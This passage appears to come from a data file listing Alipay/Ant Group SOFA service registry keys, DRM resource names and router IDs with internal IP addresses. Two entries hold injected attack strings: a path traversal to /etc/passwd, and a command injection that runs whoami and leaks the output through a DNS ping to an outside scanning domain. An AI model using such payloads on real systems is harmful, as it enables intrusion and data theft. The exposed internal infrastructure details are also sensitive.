FA_ROUTER","DATA_ID_11.160.177.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.dtEnrollStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.facade.api.product.ProductQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientRateMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.game.rpc.api.ChatGameRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.FinvtDistributeLockRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:ddsconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agap.service.facade.mng.api.WordCheckMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:devrc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finadvisorbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.YebSimpleIncomeInfoRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.gateway.api.UnifyCiProxyAdapter:1.0:wallecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.article.replacelink.facade.ArticleReplaceLinkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.shceduler.config.OrderSchedulerConfigDRMResource.numOfTimeoutTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financeprod.financing.api.facade.FinancingProductAndAssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.CaseLibFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.FssCommandService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcomment.common.service.facade.api.comment.CommentTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.sdk.open.service.query.GremlinService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.NettingClearingRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.workorder.WorkOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:securitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:meshysale_assetMachineChangeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.GlobalOrderSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.common.shared.spi.InternalRemoteContentSecCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.BusinessParamServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.usertask.facade.TaskContentRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.CashingClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.24.10.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizrecon.facade.ext.ReconFetchEndpointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0:antbuservice-global-antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.neardata.query.service.ShopQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yanchaobackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.rule.KbdishRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.plugin.WsIntegrationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ASTTRANSDATA_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfbsc.facade.api.allocationfactor.AllocationFactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..��..��..��..��..��..��..��..��/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-S-AML#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","das4int@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.common.service.facade.fund.FundAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.esp.hbase.interfaces.endpoint.facade.rest.AppRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finormweb.service.facade.RiskScopeSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.resolutioncenter.service.facade.api.DisputeProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AntiDuplicateRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.auth.AuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelCreateOperatorContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.246.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.acappcore.common.service.facade.buildpack.BuildpackRegionRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.account.RepayAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbillcenter.facade.service.BillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_AEICORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.65.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iscProcessPushCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.AppOperateServiceFacade:1.0:gmp-openplatform-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:yfdbackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_VENDORCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finorm.core.service.guardian.OperationLogCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudnet.facade.callback.UniformCallbackFacade:1.0:nfcc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmhatcher.common.service.facade.api.InvolvedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.ServiceEventProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.switcher.midasCommonTair.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaocore.service.facade.VoucherManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.ray.serving.common.service.facade.EndpointRoutingService:1.0:test-ci@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.feed.CommonFeedQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:smcp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.FeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:charthubtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.ExposureQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.ShopDecorateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.ssu.SsuConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.facade.MasterDataQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ResultCodeManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppConfManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudbox.cloudbox_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:itemProcessBeforeStartHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:clockBroadNameDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.netflowcore.api.DrmNotifyLocalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recruitcore.manage.facade.api.uniactivity.UniActivityPageAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.share.ShareRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcardcenter.service.facade.unioncard.manage.HbUnionCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:predictproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.offsetTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdpmng.facade.UcdpTairKeyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cqxjoa_ProcessCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.extactivity.ExtActivityLeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.172.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.basic.library.facade.BasicLibraryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.AuditLogManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.shared.transport.TransportTerminalUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;ping `whoami`GIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBOI------.rce.scan.noble.dn5l0g.co;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.consumetrade.service.GoldGrayControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.89.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.ParamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:hyp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:ampeAnalyseApiService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cdp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.cloudmonitor.service.facade.AlertEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.BankInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.alarmanalysis.service.MetadataAtomService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.pcard.api.PCardManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_XY_TEST0726_01#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityprodmng.common.service.variable.VariableQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.taobaocredible.TaobaoCredibleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:imemberprodOutSyncTransCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.103.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.TaskInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.localZdalproxy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpromocenter.recruit.platform.service.facade.api.PlanApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dceptrans.ldctrservice.LdcTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.common.util.drm.K53SwitchZ50GrayDRM.grayByProdCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.122.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.ArticleFavoriteQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkoyzbroker.spi.deploy.processor.DataEffectProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.heralib.service.facade.api.GZoneComputeQueryServiceFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdEntityOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcprod.common.service.facade.CommunityInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchcommerce.pms.common.service.facade.api.MobilePosLicenseExtMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.customerservice.RechargeLegalQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.agreement.api.query.CommonUsageAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.publish.drm.RulePublishResource.drmPushDelayMillisec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cloudbox.facade.api.workorder.SubmitWorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprotocol.common.service.facade.ShumiUserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.smileface.SmileFaceCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.examination.api.CstExaminationOperateService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:controller-params@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightmng.common.service.facade.strategy.api.StrategySceneRelatedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.248.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:trsbrain-selfcure@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.PaasRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcredittrans.facade.personloan.api.PlctransAsyncTallyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.plugin.PluginQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.annual.PriceAnnualAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcore.api.ThingShadowApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antdataassets.facade.kpi.KpiInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:compassprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.MerchantContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.api.FinServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.trade.TradeMerchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_WORKFLOW#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crab.center.facade.api.CrabCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.171.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.udataservice.service.facade.DataSetQueryServiceFacade:1.0:mrchexternal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.30.210.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:livetradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.PlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.content.ContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.linkide.api.LinkIDEOperationsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.biz.service.api.inner.WithdrawAckAdvanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.secucommunity.common.service.facade.search.api.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyManager.userSuffixRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-yutu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.chargefront.biz.service.schedule.period.PeriodTaskProcessDrm.onceProcessNum,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finassetpreference@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.CZFlowSceneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${certyfymng}:name=com.alipay.common.session.sessionConfigDrm.dataSeparate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.processmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileic.common.service.facade.token.spi.VerifyFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.UserInvoiceInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finxbff:name=com.alipay.finxbff.weaver.unit.marketFundLastYear,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paydecision:name=com.alipay.paydecision.service.client.trigger.PaydecisionTimelinessResource.cacheSwitchStrategy,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.fillRegularTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.punishcenter.common.service.facade.PunishStrategyLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinquotationprod.common.service.facade.api.SecuIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.entity.EntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.174.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:csprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.mybank.bkloansceneprod.data.MemberInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwjdkvii@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChargeAsyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.gotoneServiceCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.247.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundselling.common.service.productx.facade.InsuAssetClaimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.liquidity.LiquidityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.8.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_FPLIQUIDATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.gfcenter.common.service.facade.SettleInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.domainSuffix:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.domainSuffix,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfsettle@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductFacade:1.0:MOBILE_CERT@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_demoProcessmngCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.estimate.OfficialFundEstimateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.manage.PacVoucherAmountConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SO